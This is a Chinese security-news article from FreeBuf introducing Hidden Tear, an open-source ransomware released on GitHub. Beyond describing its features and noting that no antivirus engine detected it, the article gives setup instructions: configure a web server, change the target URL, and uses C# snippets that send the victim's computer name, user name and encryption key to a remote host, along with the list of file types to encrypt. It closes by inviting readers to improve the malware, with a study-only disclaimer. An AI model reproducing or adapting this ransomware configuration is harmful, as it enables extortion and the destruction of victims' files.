FreeBuf曾经报道过众多的勒索软件，而勒索软件的成本也越来越低。今年5月，暗网中曾出现过三步即可傻瓜化制作勒索软件的Tox工具，现在，GitHub上出现了一款开源的勒索软件Hidden Tear。

功能

使用AES算法加密文件
把加密密钥发送到某个服务器
被加密的文件可以通过密钥和解密软件解密
软件会在用户桌面创建一个文本文件，包含勒索信息(如：让受害者如何汇款等信息)

特色

软件仅有12KB

根据2015年8月15日的扫描结果，35款杀毒软件无一款检测出病毒。

演示视频

使用方法

你得要有一个web服务器，并且支持脚本语言，如php，python等。将此行修改成你的URL(最好使用https连接，防止窃听)

string targetURL = "http://www.utkusen.com/hidden-tear/write.php?info=";

脚本会将GET参数写入一个文本文件中，发送的进程则是在SendPassword()函数中

string info = computerName + "-" + userName + " " + password;
var fullUrl = targetURL + info;
var conent = new System.Net.WebClient().DownloadString(fullUrl);

你还可以修改会被加密的文件的后缀列表，默认列表为:

var validExtensions = new[]{".txt", ".doc", ".docx", ".xls", ".xlsx", ".ppt", ".pptx", ".odt", ".jpg", ".png", ".csv", ".sql", ".mdb", ".sln", ".php", ".asp", ".aspx", ".html", ".xml", ".psd"};

实际上这款软件有很多地方仍需改进，比如软件所使用的AES加密是对称性的加密，并不适合勒索软件，但正是由于软件是开源的，大家可以不断完善它。

文中提及的部分技术和工具可能带有一定攻击性，仅供安全学习和教学用途，禁止非法使用。

* 参考来源GitHub，vulture翻译，转载请注明来自FreeBuf黑客与极客（FreeBuf.COM）